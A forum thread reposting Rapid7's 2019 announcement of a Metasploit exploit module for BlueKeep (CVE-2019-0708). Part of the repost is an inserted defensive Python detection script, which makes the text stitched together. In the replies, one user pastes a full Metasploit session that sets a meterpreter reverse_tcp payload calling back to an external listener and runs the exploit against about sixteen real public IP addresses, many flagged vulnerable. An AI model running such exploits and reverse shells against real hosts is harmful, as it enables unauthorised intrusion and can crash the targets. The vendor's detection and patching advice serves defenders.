Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708)

Posted by Nytro

by Brent Cook

Sep 06, 2019

Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation.

As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk.

Exploitation notes

By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. Server versions of Windows also require a non-default configuration for successful exploitation—namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future.

One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, @rickoates (https://twitter.com/rickoates), @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0’s original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here!

Detection and solution notes

Defenders may want to note that, at the network level, BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner. If your network IDS/IPS already detects the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode by default spawns its child process from the Windows process spoolsv.exe, an indicator of compromise similar to that of exploits such as EternalBlue (MS17-010).
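The two indicators named above, worked into runnable detection code as an added example (this is not code from the Rapid7 post or from Metasploit). The network check parses an RDP Client Network Data block (TS_UD_CS_NET, MS-RDPBCGR 2.2.1.3.4) and flags a client that explicitly requests the MS_T120 static virtual channel, which is the indicator that public IDS signatures for the BlueKeep scanner key on; note that the channel list is only visible on the wire when the connection negotiates standard RDP security, since with TLS/CredSSP it travels inside the TLS tunnel. The host check flags unexpected children of spoolsv.exe in process-creation records. The flattened "Key: value|Key: value" Sysmon line format, the sample events and the spooler child allowlist are constructed assumptions to be tuned to your own fleet.

```python
"""Detection helpers for the two BlueKeep indicators: the MS_T120 channel
request on the wire and spoolsv.exe spawning an unexpected child on the host.
All sample data in this file is constructed for illustration."""
import struct
from dataclasses import dataclass
from typing import Iterable, List

CS_NET = 0xC003              # TS_UD_HEADER.type for Client Network Data
SUSPICIOUS_CHANNEL = "MS_T120"  # channel legitimate clients do not ask for by name


def parse_cs_net_channels(block: bytes) -> List[str]:
    """Return the static virtual channel names in a TS_UD_CS_NET block.

    Layout: type (u16 LE), length (u16 LE), channelCount (u32 LE), then
    channelCount CHANNEL_DEF entries of an 8-byte ANSI name + 4-byte options.
    Raises ValueError on a mistyped or truncated block so callers fail closed.
    """
    if len(block) < 8:
        raise ValueError("block too short for a TS_UD_CS_NET header")
    ud_type, ud_len, count = struct.unpack_from("<HHI", block, 0)
    if ud_type != CS_NET:
        raise ValueError("not a Client Network Data block (type 0x%04x)" % ud_type)
    if ud_len != 8 + 12 * count or len(block) < ud_len:
        raise ValueError("length field does not match channel count")
    names = []
    for i in range(count):
        raw_name = block[8 + 12 * i: 16 + 12 * i]
        names.append(raw_name.split(b"\x00", 1)[0].decode("ascii", "replace"))
    return names


def rdp_connect_is_suspicious(block: bytes) -> bool:
    """True when the client asks for the MS_T120 channel by name."""
    return SUSPICIOUS_CHANNEL in parse_cs_net_channels(block)


def build_cs_net(names: Iterable[str]) -> bytes:
    """Constructed test-data helper: encode a channel list as TS_UD_CS_NET."""
    body = b"".join(n.encode("ascii").ljust(8, b"\x00") + struct.pack("<I", 0)
                    for n in names)
    return struct.pack("<HHI", CS_NET, 8 + len(body), len(list(names))) + body


@dataclass
class ProcEvent:
    parent: str   # parent image file name, lower-cased
    image: str    # child image file name, lower-cased
    cmdline: str


# Assumption: children the print spooler legitimately starts; tune per fleet.
EXPECTED_SPOOLER_CHILDREN = {"splwow64.exe", "printfilterpipelinesvc.exe"}


def parse_sysmon_line(line: str) -> ProcEvent:
    """Parse a flattened Sysmon Event ID 1 record (constructed format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(":")
        fields[key.strip()] = value.strip()
    return ProcEvent(parent=fields["ParentImage"].rsplit("\\", 1)[-1].lower(),
                     image=fields["Image"].rsplit("\\", 1)[-1].lower(),
                     cmdline=fields.get("CommandLine", ""))


def spooler_child_alerts(lines: Iterable[str]) -> List[str]:
    """Return one alert string per unexpected child of spoolsv.exe."""
    alerts = []
    for line in lines:
        ev = parse_sysmon_line(line)
        if ev.parent == "spoolsv.exe" and ev.image not in EXPECTED_SPOOLER_CHILDREN:
            alerts.append("spoolsv.exe spawned %s: %s" % (ev.image, ev.cmdline))
    return alerts


# Constructed sample events: one benign spooler child, one suspicious, one unrelated.
SAMPLE_EVENTS = [
    r"EventID: 1|Image: C:\Windows\System32\PrintFilterPipelineSvc.exe"
    r"|ParentImage: C:\Windows\System32\spoolsv.exe|CommandLine: PrintFilterPipelineSvc.exe -Embedding",
    r"EventID: 1|Image: C:\Windows\System32\cmd.exe"
    r"|ParentImage: C:\Windows\System32\spoolsv.exe|CommandLine: cmd.exe /c whoami",
    r"EventID: 1|Image: C:\Windows\System32\cmd.exe"
    r"|ParentImage: C:\Windows\explorer.exe|CommandLine: cmd.exe",
]

if __name__ == "__main__":
    benign = build_cs_net(["rdpdr", "cliprdr"])
    scanner_like = build_cs_net(["rdpdr", "rdpsnd", "MS_T120"])
    print("benign connect suspicious?", rdp_connect_is_suspicious(benign))
    print("scanner-like connect suspicious?", rdp_connect_is_suspicious(scanner_like))
    for alert in spooler_child_alerts(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Both checks are deliberately narrow: the wire check fails closed on malformed input rather than guessing, and the host check alerts on an allowlist miss rather than on a blocklist of known shells, so a payload that spawns something other than cmd.exe is still caught.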

All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch.

While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities.

The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability.

[Chart: BlueKeep-1.png, Rapid7 Labs observed RDP activity]

Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. The chart above looks similar to the Labs team’s previous report on RDP and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes.

For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7’s previous analysis here.

About Metasploit and Rapid7

Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com.

 

Source: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true


This is interesting. I want to write a more detailed tutorial on the forum about how it gets exploited :)

19 hours ago, mDOS said:

This is interesting. I want to write a more detailed tutorial on the forum about how it gets exploited :)

set rhosts && run? :))

7 minutes ago, BiosHell said:

set rhosts && run? :))

Yeah, but I want to make it more explicit myself :)


You can piss on that exploit, it's good for nothing

 

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 185.xxx.xxx.165
LHOST => 185.xxx.xxx.165
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4443
LPORT => 4443
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   RDP_CLIENT_IP    192.168.0.100    yes       The client IPv4 address to report during connect
   RDP_CLIENT_NAME  ethdev           no        The client computer name to report during connect, UNSET = random
   RDP_DOMAIN                        no        The client domain name to report during connect
   RDP_USER                          no        The username to report during connect, UNSET = random
   RHOSTS                            yes       The target address range or CIDR identifier
   RPORT            3389             yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     185.xxx.xxx.165  yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 1
TARGET => 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.21
2.162 139.199.86.136 109.145.192.146 148.70.11.71 110.166.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
RHOSTS => 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.212.162 139.199.86.136 109.145.192.146 148.70.11.71 110.16
6.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 14.141.169.229

[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 14.141.169.229:3389   - Detected RDP on 14.141.169.229:3389   (Windows version: 6.0.6003) (Requires NLA: No)
[+] 14.141.169.229:3389   - The target is vulnerable.
[*] 14.141.169.229:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 14.141.169.229:3389 - Surfing channels ...
[*] 14.141.169.229:3389 - Lobbing eggs ...
[-] 14.141.169.229:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 211.159.157.90
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 211.159.157.90:3389   - Detected RDP on 211.159.157.90:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 211.159.157.90:3389   - The target is vulnerable.
[*] 211.159.157.90:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 211.159.157.90:3389 - Surfing channels ...
[-] 211.159.157.90:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 106.12.134.221
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 106.12.134.221:3389   - Detected RDP on 106.12.134.221:3389   (Windows version: N/A) (Requires NLA: No)
[*] 106.12.134.221:3389   - Cannot reliably check exploitability.
[-] 106.12.134.221:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 213.229.36.215
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 213.229.36.215:3389   - Detected RDP on 213.229.36.215:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 213.229.36.215:3389   - The target is vulnerable.
[*] 213.229.36.215:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 213.229.36.215:3389 - Surfing channels ...
[*] 213.229.36.215:3389 - Lobbing eggs ...
[-] 213.229.36.215:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 1.197.204.56
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 1.197.204.56:3389     - The target service is not running or refused our connection.
[-] 1.197.204.56:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.91.228.185
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.91.228.185:3389   - Detected RDP on 101.91.228.185:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.91.228.185:3389   - The target is vulnerable.
[*] 101.91.228.185:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.91.228.185:3389 - Surfing channels ...
[*] 101.91.228.185:3389 - Lobbing eggs ...
[-] 101.91.228.185:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 23.249.16.157
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 23.249.16.157:3389    - Detected RDP on 23.249.16.157:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 23.249.16.157:3389    - The target is vulnerable.
[*] 23.249.16.157:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 23.249.16.157:3389 - Surfing channels ...
[*] 23.249.16.157:3389 - Lobbing eggs ...
[-] 23.249.16.157:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 177.43.212.162
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 177.43.212.162:3389   - Detected RDP on 177.43.212.162:3389   (Windows version: N/A) (Requires NLA: No)
[+] 177.43.212.162:3389   - The target is vulnerable.
[-] 177.43.212.162:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError
[*] Exploiting target 139.199.86.136
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 139.199.86.136:3389   - Detected RDP on 139.199.86.136:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 139.199.86.136:3389   - The target is vulnerable.
[*] 139.199.86.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 139.199.86.136:3389 - Surfing channels ...
[-] 139.199.86.136:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 109.145.192.146
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 109.145.192.146:3389  - Detected RDP on 109.145.192.146:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 109.145.192.146:3389  - The target is vulnerable.
[*] 109.145.192.146:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 109.145.192.146:3389 - Surfing channels ...
[*] 109.145.192.146:3389 - Lobbing eggs ...
[-] 109.145.192.146:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 148.70.11.71
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 148.70.11.71:3389     - Detected RDP on 148.70.11.71:3389     (Windows version: 6.1.7601) (Requires NLA: No)
[+] 148.70.11.71:3389     - The target is vulnerable.
[*] 148.70.11.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 148.70.11.71:3389 - Surfing channels ...
[-] 148.70.11.71:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 110.166.254.99
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 110.166.254.99:3389   - Cannot reliably check exploitability.
[-] 110.166.254.99:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 132.232.224.174
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 132.232.224.174:3389  - Cannot reliably check exploitability.
[-] 132.232.224.174:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploiting target 101.89.112.158
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 101.89.112.158:3389   - Detected RDP on 101.89.112.158:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 101.89.112.158:3389   - The target is vulnerable.
[*] 101.89.112.158:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 101.89.112.158:3389 - Surfing channels ...
[-] 101.89.112.158:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 50.247.84.178
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 50.247.84.178:3389    - Detected RDP on 50.247.84.178:3389    (Windows version: 6.0.6002) (Requires NLA: No)
[+] 50.247.84.178:3389    - The target is vulnerable.
[*] 50.247.84.178:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 50.247.84.178:3389 - Surfing channels ...
[*] 50.247.84.178:3389 - Lobbing eggs ...
[-] 50.247.84.178:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploiting target 118.24.118.53
[*] Started reverse TCP handler on 185.xxx.xxx.165:4443
[*] 118.24.118.53:3389    - Detected RDP on 118.24.118.53:3389    (Windows version: 6.1.7601) (Requires NLA: No)
[+] 118.24.118.53:3389    - The target is vulnerable.
[*] 118.24.118.53:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[*] 118.24.118.53:3389 - Surfing channels ...
[-] 118.24.118.53:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.

 


Yes, it's not exactly reliable, it's open-source. There are probably far more stable versions out there, though I don't think they are 100% either.

31 minutes ago, joeyjoe said:

You can piss on that exploit, it's good for nothing


There was no point in making the module as long as it still has to be exploited manually, plus it's still unstable
